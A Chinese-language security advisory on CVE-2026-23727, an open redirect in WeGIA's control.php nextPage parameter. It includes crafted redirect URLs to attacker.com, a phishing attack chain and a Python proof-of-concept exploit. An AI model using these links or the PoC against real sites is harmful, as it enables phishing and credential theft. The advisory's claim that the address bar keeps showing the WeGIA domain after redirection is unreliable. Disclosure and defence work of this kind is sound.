CVE-2026-23727 WeGIA开放重定向漏洞

漏洞信息

漏洞编号

CVE-2026-23727

漏洞类型

开放重定向 (Open Redirect)

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

WeGIA

漏洞概述

WeGIA是一款面向慈善机构的Web管理系统。2026年1月16日披露的CVE-2026-23727漏洞为开放重定向漏洞，位于WeGIA应用的/WeGIA/controle/control.php端点。该漏洞源于nextPage参数未经过充分验证，当配合metodo=listarTodos和nomeClasse=TipoSaidaControle使用时，攻击者可将用户重定向至任意外部网站。由于用户被可信的WeGIA域名引导至钓鱼页面，因此更易遭受凭证窃取、恶意软件传播和社会工程攻击。此漏洞影响3.6.2之前的所有版本，CVSS评分6.1，属于中等严重程度。攻击无需认证，但需要用户交互（如点击链接），网络可达即可利用。

技术细节

漏洞存在于WeGIA的控制端点control.php中，具体参数为nextPage。该参数用于指定页面跳转目标，但应用未对其进行有效校验。攻击者可构造恶意请求：/WeGIA/controle/control.php?nomeClasse=TipoSaidaControle&metodo=listarTodos&nextPage=https://attacker.com/phishing。当管理员或用户访问此链接时，会被重定向至攻击者控制的外部域名。由于浏览器地址栏仍显示WeGIA的合法域名，用户难以察觉异常，从而增加钓鱼攻击的成功率。漏洞利用条件宽松，无需认证即可发起攻击，但需诱导用户点击恶意链接。修复版本为3.6.2，修复方式应是对nextPage参数进行白名单校验或限制跳转范围。

攻击链分析

STEP 1

1

攻击者构造恶意链接：/WeGIA/controle/control.php?nomeClasse=TipoSaidaControle&metodo=listarTodos&nextPage=https://attacker.com

STEP 2

2

攻击者通过钓鱼邮件、社交工程等方式诱导WeGIA管理员或用户点击该恶意链接

STEP 3

3

用户点击链接后，浏览器向WeGIA服务器发起HTTP请求

STEP 4

4

服务器未验证nextPage参数，直接返回302重定向响应，将用户浏览器跳转至攻击者指定的外部网站

STEP 5

5

用户被引导至钓鱼页面（显示为WeGIA域名），输入敏感信息或下载恶意软件

STEP 6

6

攻击者获取用户凭证、植入恶意软件或执行进一步的攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-23727 Open Redirect PoC
# Affected: WeGIA < 3.6.2
# Target: /WeGIA/controle/control.php
# Parameters: nextPage, metodo=listarTodos, nomeClasse=TipoSaidaControle

import requests
import sys

def exploit_open_redirect(target_url, redirect_target):
    """
    Exploit open redirect vulnerability in WeGIA
    target_url: Base URL of WeGIA application
    redirect_target: Malicious URL to redirect victims
    """
    params = {
        'nomeClasse': 'TipoSaidaControle',
        'metodo': 'listarTodos',
        'nextPage': redirect_target
    }
    
    exploit_url = f"{target_url}/WeGIA/controle/control.php"
    
    print(f"[*] Target: {exploit_url}")
    print(f"[*] Redirecting to: {redirect_target}")
    
    try:
        response = requests.get(exploit_url, params=params, allow_redirects=False)
        
        if response.status_code in [301, 302, 303, 307, 308]:
            location = response.headers.get('Location', '')
            print(f"[+] Open Redirect Confirmed!")
            print(f"[+] Location Header: {location}")
            return True
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            return False
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <redirect_url>")
        print(f"Example: python {sys.argv[0]} http://192.168.1.100 https://evil.com/phishing")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    redirect = sys.argv[2]
    exploit_open_redirect(target, redirect)

影响范围

WeGIA < 3.6.2

防御指南

临时缓解措施

在官方修复发布前，可通过Web应用防火墙（WAF）规则临时拦截包含外部域名的nextPage参数，或在反向代理层配置重定向限制。建议尽快升级至3.6.2版本以彻底消除该安全风险。